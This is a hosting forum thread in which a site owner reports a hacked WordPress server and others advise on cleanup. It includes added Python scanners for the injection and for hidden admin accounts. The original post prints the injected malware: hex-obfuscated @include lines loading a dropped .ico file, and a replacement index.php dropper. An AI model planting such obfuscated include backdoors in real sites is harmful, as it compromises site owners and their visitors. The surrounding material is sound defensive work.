  1. #1

    Hacked/infected server

    A few days ago I realized a few of my sites are infected. I tried hard, searching each file one by one, and in the end I found all index.php and some wp-config.php files have 755 permissions.

    I opened those files and found code added after <?php; the added code looks like this:

    /*76a6b*/

    @include "\x2fho\x6de/\x7aem\x72ao\x72g/\x70ub\x6cic\x5fht\x6dl/\x6bna\x71u.\x6frg\x2fup\x64at\x65 f\x6fr \x37.0\x2fst\x65p \x32/f\x61vi\x63on\x5f14\x64ed\x36.i\x63o";

    /*76a6b*/

    After decoding this line, I found a *.ico file had been uploaded to my server, like this one: favicon_445351.ico

    All index.html files were renamed to index.html.bak.bak and an index.php was created with this code:

    <?php
    /*85130*/

    @include "\x2fh\x6fm\x65/\x7ae\x6dr\x61o\x72g\x2fp\x75b\x6ci\x63_\x68t\x6dl\x2fk\x6ea\x71u\x2eo\x72g\x2fu\x70d\x61t\x65 \x66o\x72 \x37.\x30/\x73t\x65p\x202\x2ff\x61v\x69c\x6fn\x5f1\x34d\x65d\x36.\x69c\x6f";

    /*85130*/

    echo file_get_contents('index.html.bak.bak');

    I tried manually to remove all the @include codes added to my server and change the *.php file permissions to 644, but the next day they added the *.ico file in a different directory and the @include codes were added again.

    It seems they are using each visit to my site(s) to activate the code, which sends spam emails.

    Has anyone experienced this, and if anyone knows, can you please let me know how I can prevent this?
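A defender-side helper for the injected snippet shown in this post, added here as an example and not code from the thread: it resolves the \xHH (and \NNN octal) escapes the way PHP does for double-quoted strings, finds the marker-wrapped @include pattern in .php files, and flags includes whose target is a non-code file such as a .ico. The sample file text and its /home/example/... path are constructed placeholders, not values from the thread.

```python
import re
from pathlib import Path

# Constructed sample (placeholder account and path) shaped like the injected index.php
# shown in the post: hex-escaped @include wrapped in a pair of /*xxxxx*/ markers.
SAMPLE_INDEX_PHP = r'''<?php
/*85130*/
@include "\x2fho\x6de/\x65x\x61mp\x6ce\x2fpub\x6cic\x5fhtml/f\x61vicon\x5f1a2b3c.i\x63o";
/*85130*/
echo file_get_contents('index.html.bak.bak');
'''

# Escapes PHP resolves in double-quoted strings that the dropper relies on: \xHH and \NNN.
_ESC_RE = re.compile(r'\\x([0-9A-Fa-f]{1,2})|\\([0-7]{1,3})')

# Marker comment, an @include of a double-quoted string, then the same marker again.
INJECT_RE = re.compile(
    r'/\*(?P<marker>[0-9a-f]{4,8})\*/\s*@include\s+"(?P<raw>[^"]+)"\s*;\s*/\*(?P=marker)\*/',
    re.DOTALL,
)

# PHP executes whatever it includes; an "image" pulled in via include is code in disguise.
NON_CODE_EXT = {".ico", ".png", ".jpg", ".gif", ".txt", ".bak"}


def php_unescape(raw: str) -> str:
    """Resolve \\xHH and \\NNN escapes the way PHP does for double-quoted strings."""
    def repl(m):
        if m.group(1) is not None:
            return chr(int(m.group(1), 16))
        return chr(int(m.group(2), 8))
    return _ESC_RE.sub(repl, raw)


def find_injections(source: str) -> list:
    """Return one record per marker-wrapped @include found in a PHP file's text."""
    hits = []
    for m in INJECT_RE.finditer(source):
        path = php_unescape(m.group("raw"))
        hits.append({
            "marker": m.group("marker"),
            "path": path,
            "suspicious_extension": Path(path).suffix.lower() in NON_CODE_EXT,
        })
    return hits


def scan_tree(root: str) -> list:
    """Walk a docroot and report every .php file carrying the injection pattern."""
    findings = []
    for php_file in Path(root).rglob("*.php"):
        try:
            text = php_file.read_text(errors="replace")
        except OSError:
            continue
        findings += [{"file": str(php_file), **hit} for hit in find_injections(text)]
    return findings
```

Run scan_tree() against a copy of the account's public_html; the decoded path of each hit tells you which dropped file to quarantine and which directory the attacker can write to.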

  2. #2
    Join Date: Oct 2002 | Location: /roof/ledge | Posts: 28,075
    You need to determine how they're getting in. No amount of edits like you're doing will likely fix it; it's going to take determining how they're doing it and closing that hole. Changing permissions on files: that's likely more than simple WP access, so it's possible they have a shell script on your account (or, more simply, FTP access).

  3. #3
    My FTP and SSH logs don't show any other connections, but I did see an admin on my WP which is hidden, and I'm not sure how to delete that user/admin.

    When I list all users, I can see 2 admins; when I click on the admin list, it only shows my username. I tried a few code snippets in functions.php but still no luck finding/removing the second admin.

  4. #4
    Join Date: Dec 2013 | Location: Lipova / Romania | Posts: 457
    First of all, like @bear said, you should find out how they are getting in. It doesn't matter if you remove the second admin, as the hacker can add another admin again, and so on. Do you have the latest version of WP installed? What services do you use to access your server (SSH, cPanel, FTP)? What ports do you have open? I would suspect a weak SSH/FTP dictionary password or a vulnerable script.

  5. #5
    I have the latest WP and plugins updated.

    For editing I use cPanel and WinSCP. Since there are no logins other than mine via FTP and SSH, I don't think the password is the case; as for a vulnerable script, I'm not sure.

  6. #6
    Join Date: Dec 2013 | Location: Lipova / Romania | Posts: 457
    It can be a vulnerable plugin (even if updated). You could also have your computer infected with a keylogger (do a scan with an antivirus; Malwarebytes is good in my opinion). Is cPanel up to date? Is it licensed or nulled?

  7. #7
    Join Date: Oct 2002 | Location: /roof/ledge | Posts: 28,075
    Quote Originally Posted by Dizi:
    no luck on finding/removing the second admin.
    You should be able to remove that from phpMyAdmin directly in the database, but it might not fix this. If you can't affect his account via WP, that sounds like he has removed some of your permissions as the admin to protect that. In phpMyAdmin, find his user and compare his settings to yours. Match yours to his, then remove his (or at least change the email and password on it, and reduce his perms at the same time).

    Your installation is likely trashed at this point, and will require a full reinstall of the latest version. No files in that account should be trusted, IMHO. I do say, still, that if he's changing file/directory permissions, he has more access than just WP.

    Quote Originally Posted by Dizi:
    My FTP and SSH logs don't show any other connections
    A shell script would not likely log actions in SSH logs. It's a PHP script.
    Last edited by bear; 04-09-2017 at 10:09 AM.

  8. #8
    Join Date: Dec 2013 | Location: Lipova / Romania | Posts: 457
    @bear: The hacker could have root access to the server (I suspect that, because he is able to modify files), so SSH logs could help him to identify the security hole. However, the hacker can delete the SSH access logs. The hacker could have FTP access to the server, which can be checked in the FTP server logs (any successful login from an unknown IP). The hacker can also modify files through a vulnerable PHP script; this can be identified by checking the webserver access logs/error logs.

  9. #9
    I was able to find this:

    Mine: 1 wp_capabilities a:1:{s:13:"administrator";s:1:"1";}

    For this one I can't find the username:

    1331 wp_capabilities a:1:{s:13:"administrator";s:1:"1";}
    1331 wp_user_level 10

    If I delete this from usermeta, will it delete the user as well?

  10. #10
    Join Date: Dec 2015 | Posts: 125
    If you can see the additional admin user which was created without your knowledge, you have to remove it; that user may be the culprit.

    You can remove the WP users from phpMyAdmin as well: access the database using phpMyAdmin and select the table wp_users; there you can find the users and can remove it from there.

    Also please reset all the admin user passwords and cPanel and FTP logins as well.

  11. #11
    When I list all users in wp_users, there is no user with ID 1331.
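For the situation in posts #9 and #11 (a wp_usermeta row granting administrator to a user_id that has no wp_users row), an added check that is not code from the thread: it parses the PHP-serialized wp_capabilities value, walks constructed sample rows, and reports administrator grants that are orphaned or not in an expected set. The table contents and the expected-admin set are assumptions made up for the example.

```python
import re

# PHP serialize() tokens used by wp_capabilities: a:<n>:{  s:<len>:"  b:<0|1>;  i:<int>;
_TOKEN = re.compile(r'(a):(\d+):\{|(s):(\d+):"|(b):([01]);|(i):(-?\d+);')

def php_unserialize(data: str):
    """Minimal PHP unserialize for the arrays/strings/bools WordPress stores for roles."""
    pos = 0
    def parse():
        nonlocal pos
        m = _TOKEN.match(data, pos)
        if not m:
            raise ValueError(f"unexpected data at offset {pos}: {data[pos:pos + 12]!r}")
        pos = m.end()
        if m.group(1):                      # array: n key/value pairs, then '}'
            out = {}
            for _ in range(int(m.group(2))):
                key = parse()
                out[key] = parse()
            assert data[pos] == "}", "array not terminated"
            pos += 1
            return out
        if m.group(3):                      # string with declared byte length
            n = int(m.group(4))
            value = data[pos:pos + n]
            pos += n + 2                    # skip closing quote and ';'
            return value
        if m.group(5):
            return m.group(6) == "1"
        return int(m.group(8))
    return parse()

def audit_admins(users, usermeta, expected_admin_ids):
    """users: (ID, user_login) rows; usermeta: (user_id, meta_key, meta_value) rows. Returns
    (user_id, login_or_None, reason) per admin grant that is orphaned or not expected."""
    logins = {uid: login for uid, login in users}
    findings = []
    for uid, key, value in usermeta:
        if key != "wp_capabilities":
            continue
        # WordPress tests the role with !empty(), so "0", "", 0, False and None grant nothing.
        if php_unserialize(value).get("administrator") in (None, False, 0, "", "0"):
            continue
        if uid not in logins:
            findings.append((uid, None, "administrator capability with no wp_users row"))
        elif uid not in expected_admin_ids:
            findings.append((uid, logins[uid], "unexpected administrator"))
    return findings

# Constructed sample rows modelled on the thread: one real admin, one orphaned admin grant.
USERS = [(1, "owner")]
USERMETA = [
    (1, "wp_capabilities", 'a:1:{s:13:"administrator";s:1:"1";}'),
    (1331, "wp_capabilities", 'a:1:{s:13:"administrator";s:1:"1";}'),
]
```

Feed it the exported wp_users and wp_usermeta rows; an orphaned grant points at a usermeta row that was inserted directly (by a shell or SQL access) rather than through the WordPress user screens.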

  12. #12
    Join Date: Oct 2002 | Location: /roof/ledge | Posts: 28,075
    Quote Originally Posted by Gabriel-ZetServers:
    The hacker can also modify files through a vulnerable PHP script; this can be identified by checking the webserver access logs/error logs.
    And a shell script loaded into the account would also allow all of the above, while evading FTP and SSH logs. I'm not saying your reasoning regarding root access is wrong, just that it's less likely, since the bad guy made a WP admin account to do all this. If you have root, why bother?
    In fact, since he did make that WP admin account, that leans toward WP as being the attack vector. A WP admin can upload files, one of which could easily be a shell. With the shell, he can edit files, change perms and so on. Odds are the WP upload logs/directories would show some oddities.

    Quote Originally Posted by Dizi:
    there is no user with ID: 1331
    Looks an awful lot like "leet", a script kiddie handle...

  13. #13
    Join Date: Dec 2015 | Posts: 125
    Are you able to see the user from the WP dashboard? Did you try to remove it from there?

    I strongly recommend you block WP admin login from all IPs except your IP (you require a static IP in this case).

    You can use an .htaccess rule to block access to the wp-login.php file.

    Quote Originally Posted by Dizi:
    When I list all users in wp_users, there is no user with ID 1331.

  14. #14
    I changed wp_capabilities to a:1:{s:10:"subscriber";b:1;} and now my WP dashboard shows only 1 admin.

    I will change permissions on a few index.php files and see if there is any change/file uploaded tomorrow.

    Thank you all for the time you took to help.

  15. #15
    Join Date: Oct 2002 | Location: /roof/ledge | Posts: 28,075
    I'd suggest you check that same user (or any new ones) in the DB tomorrow as well. It's likely that account was added via injection of some sort, so it's possible he has DB access (which a shell script can do) on that account/server.
    If you have any malware scanner at your disposal like Maldet, you may wish to run that against your account. It may find something you've missed.

  16. #16
    I'll check and report back, since this post may help others with a similar or the same problem.

  17. #17
    Join Date: Dec 2013 | Location: Lipova / Romania | Posts: 457
    Quote Originally Posted by bear:
    And a shell script loaded into the account would also allow all of the above, while evading FTP and SSH logs. I'm not saying your reasoning regarding root access is wrong, just that it's less likely, since the bad guy made a WP admin account to do all this. If you have root, why bother?
    In fact, since he did make that WP admin account, that leans toward WP as being the attack vector. A WP admin can upload files, one of which could easily be a shell. With the shell, he can edit files, change perms and so on. Odds are the WP upload logs/directories would show some oddities.
    Looks an awful lot like "leet", a script kiddie handle...
    Makes sense. Thanks for the detailed explanation. I agree that most likely the hacker used a shell script. Any plugin allowing file uploads should be double-checked. Maybe somewhere the script allows .php, .cgi or other executable file uploads.

  18. #18
    Scan all files with maldet, with extra signatures for possible backdoors: https://www.rfxn.com/projects/linux-malware-detect/

    Also check there are not any unknown users in WordPress.

    Also use ModSecurity or a WAF firewall.

  19. #19
    Join Date: Apr 2011 | Location: Cybertron | Posts: 10,484
    Quote Originally Posted by Dizi: (the original post, #1, quoted in full)
    It looks like some of the issue is "solved".

    Cleaning up is important, but preventing it from happening again is even more important or you will have these issues again within a week.

    Do you have a Shared account, VPS, or Dedicated Server?

    1. Have you spoken to your host about this?

    2. In some cases, it's suggested to change the user name of the account, which the host may do for you.

    3. Have you replaced all the core WordPress files with a clean updated copy?

    4. Replaced all the plugins with a clean updated copy?

    5. Replace the theme with a clean updated copy?

    6. Are any of the plugins or themes from an unknown source?


    All passwords and user names need to be changed. Use SFTP instead of FTP.

    Also, have the computer you use looked at. If they went in through FTP, then once you connect again, they will use that information, log in, erase their tracks, and end up in the same situation again.

  20. #20
    Join Date: Sep 2002 | Location: Top Secret | Posts: 14,134
    You need to find a professional who's experienced in cleaning up this stuff. Don't simply rely on the advice of forum posters, because that's not going to actually solve anything.

  21. #21

    Question: Have you used a nulled WP theme?

    My experience is that 9/10 nulled WordPress themes are infected with a PHP backdoor. So never use anything that is "nulled".

    I recommend you check your URL here: sitecheck.sucuri. If it's not detecting anything, you still can't be sure your web is clean.

    As a next step, download your website to your computer, then check it with "free DrWeb".
    You can also compress it to a zip and upload it to VirusTotal if it is not bigger than 128 MB.

    Just as an example, I downloaded the first nulled theme that I found and checked it with VirusTotal.
    Detection 4/6
    Cyren, ESET NOD32, DrWeb, Ikarus (sorry, I can't post links)

    As you can see, DrWeb is one of the antivirus programs that detects the infection. It will also find the infected files, which you can analyse for infection. For this I use Notepad++ with a plugin which allows comparing 2 files. Then you need to find a clean WordPress file (try GitHub) and compare the 2 files. This way you can find the malicious code and clean it.

    It is also possible the malicious code will be cached, so you need to clean that too.
    Last edited by VpsGhost; 04-10-2017 at 04:14 AM.

  22. #22
    Join Date: Sep 2002 | Location: Top Secret | Posts: 14,134
    Quote Originally Posted by VpsGhost:
    Question: Have you used a nulled WP theme?
    Or plugin... But yes, that's how this stuff gets injected.
    As someone else mentioned above, use maldet, scan the server if you have root access.

  23. #23
    Join Date: Apr 2011 | Location: Cybertron | Posts: 10,484
    Quote Originally Posted by VpsGhost:
    Question: Have you used a nulled WP theme?
    Quote Originally Posted by whmcsguru:
    Or plugin... But yes, that's how this stuff gets injected.

    It doesn't have to be a nulled theme or plugin. There are legitimate themes and plugins where the designer decided to reinvent the upload process that WordPress already provides, and add their own upload process and folder. End result... people know of this unprotected second upload folder and upload PHP files to it. Instant issues. The only thing that saves them at that point is whether or not the account/host allows scripts to be easily executed. One doesn't even need to be skilled in coding to just Google those themes and find all the unprotected websites that are publicly online.

  24. #24
    Join Date: Sep 2002 | Location: Top Secret | Posts: 14,134
    You're right. It certainly doesn't have to be. However, the odds are way higher if that's the case.

  25. #25
    Join Date: Mar 2009 | Location: Here Today - Gone to Maui | Posts: 9,962
    I think everyone reading this who hasn't been hacked can understand from the complexity of the replies here that being proactive in preventing attacks is crucial. Dealing with them on the backend is not only frustrating, but time consuming.
